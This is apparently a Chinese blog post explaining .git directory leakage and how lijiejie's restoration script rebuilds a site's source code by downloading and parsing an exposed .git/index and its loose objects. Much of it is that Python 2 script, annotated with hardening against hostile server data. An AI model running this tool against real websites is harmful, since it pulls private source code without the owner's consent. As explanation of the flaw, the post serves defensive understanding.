之前做过 git 的加固，但 .git 目录泄漏这类问题还是没办法完全避免的。
之前看了乌云上提交的 git 泄漏案例，但都没有写详细的原理，于是去了 lijiejie 的博客（字太难打了，大师傅别打我 哈哈）。
如果一个网站的 .git 目录可以被直接访问，攻击者就能用其中的 index 和 objects 还原出源码，进而导致代码泄漏。
lijiejie 的脚本以及国外同类脚本的工作原理大致如下：
1. 先下载并解析 .git/index，从每个条目里取出文件的 sha1 和路径名（注意：这些内容全部来自目标服务器，是不可信输入）。
拿 lijiejie 的代码来看（下面是 Python 2 代码，转载时缩进丢失了）：
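class Scanner(object):
    """Restore a web-exposed .git directory: parse its index, then let workers fetch each blob.

    NOTE(review): the listing dropped a few characters in transcription
    (``sys.argv[-]`` and an empty ``thread_count``); the obvious values are
    restored below.
    """

    def __init__(self, thread_count=20):
        """Download ``<base_url>/index``, parse it, and queue every (sha1, path) entry.

        The base URL (the exposed .git directory) is taken from the last
        command-line argument. Output goes to a directory named after the host,
        with ':' replaced so a port does not produce an invalid directory name.

        Everything read from the index is server-supplied: entry names are
        untrusted paths and must be sanitised by whatever writes them to disk.

        Args:
            thread_count: number of worker threads to start. The listing lost
                the original value, so 20 is a placeholder -- confirm against
                the upstream script.
        """
        base_url = sys.argv[-1]
        self.base_url = base_url
        self.domain = urlparse.urlparse(base_url).netloc.replace(':', '_')
        if not os.path.exists(self.domain):
            os.mkdir(self.domain)

        print('[+] Download and parse index file ...')
        data = self._request_data(base_url + '/index')
        # parse() takes a path, so the raw index is written out first.
        with open('index', 'wb') as f:
            f.write(data)

        self.queue = Queue.Queue()
        for entry in parse('index'):
            # Entries without a sha1 carry nothing to fetch.
            if "sha1" in entry:
                self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
                print(entry['name'])

        self.lock = threading.Lock()
        self.thread_count = thread_count
        self.STOP_ME = False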
这样就拿到了每个文件的路径名和对应的 sha1。
2. 然后按 sha1 去 .git/objects/&lt;前两位&gt;/&lt;后 38 位&gt; 下载对应的 loose object：
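def get_back_file(self):
    """Worker loop: pull (sha1, path) pairs off ``self.queue`` and restore each blob.

    Runs until the queue is drained or ``self.STOP_ME`` is set, then calls
    ``self.exit_thread()``. Each object is fetched from
    ``<base_url>/objects/<sha1[:2]>/<sha1[2:]>``, inflated, checked and
    written to ``<domain>/<path>``. Both the path and the object bytes come
    from the remote .git directory, so they are treated as hostile:

    * a path that would resolve outside ``self.domain`` (absolute, ``..``,
      empty) is refused instead of written;
    * the object is only written if its SHA-1 matches the id the index
      claimed, which also catches truncated downloads;
    * only objects whose header is ``blob <size>\\0`` are written, and only
      that first header is stripped (the original regex removed every
      match anywhere in the payload).

    Progress is reported through ``self._print``.
    """
    import hashlib  # local import: the file-level import block is not in view

    root = os.path.abspath(self.domain)
    while not self.STOP_ME:
        try:
            sha1, file_name = self.queue.get(timeout=0.5)
        except Queue.Empty:
            break

        # The index is remote data: refuse anything that would land outside
        # the output directory (os.path.join discards root for absolute paths).
        target = os.path.abspath(os.path.join(root, file_name))
        if target == root or not target.startswith(root + os.sep):
            self._print('[Skipped] unsafe path %s' % file_name)
            continue

        for _ in range(3):
            try:
                folder = '/objects/%s/' % sha1[:2]
                raw = self._request_data(self.base_url + folder + sha1[2:])
                # NOTE(review): zlib.decompress has no output bound; a hostile
                # server can answer with a decompression bomb here.
                obj = zlib.decompress(raw)
                # A loose object's id is the SHA-1 of "<type> <size>\0<payload>".
                if hashlib.sha1(obj).hexdigest() != sha1:
                    raise ValueError('%s: object does not hash to %s' % (file_name, sha1))
                header, _sep, body = obj.partition(b'\0')
                if not header.startswith(b'blob '):
                    # Not a file's content (tree/commit/tag); retrying won't help.
                    self._print('[Error] %s: not a blob object' % file_name)
                    break
                target_dir = os.path.dirname(target)
                if not os.path.exists(target_dir):
                    os.makedirs(target_dir)
                with open(target, 'wb') as f:
                    f.write(body)
                self._print('[OK] %s' % file_name)
                break
            except urllib2.HTTPError as e:
                # 404 is final; any other HTTP error falls through to a retry.
                if str(e).find('HTTP Error 404') >= 0:
                    self._print('[File not found] %s' % file_name)
                    break
            except Exception as e:
                # Hash mismatch / decompression failure: report and retry.
                self._print('[Error] %s' % e)
    self.exit_thread()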
3. 用 zlib 解压下载到的 loose object，去掉开头的 `blob <size>\0` 头部，剩下的就是文件内容，按 index 里的路径写回本地即可重构出源码。注意路径名和对象内容都来自目标服务器，写盘前要校验路径不会逃出输出目录，否则脚本本身就成了攻击面。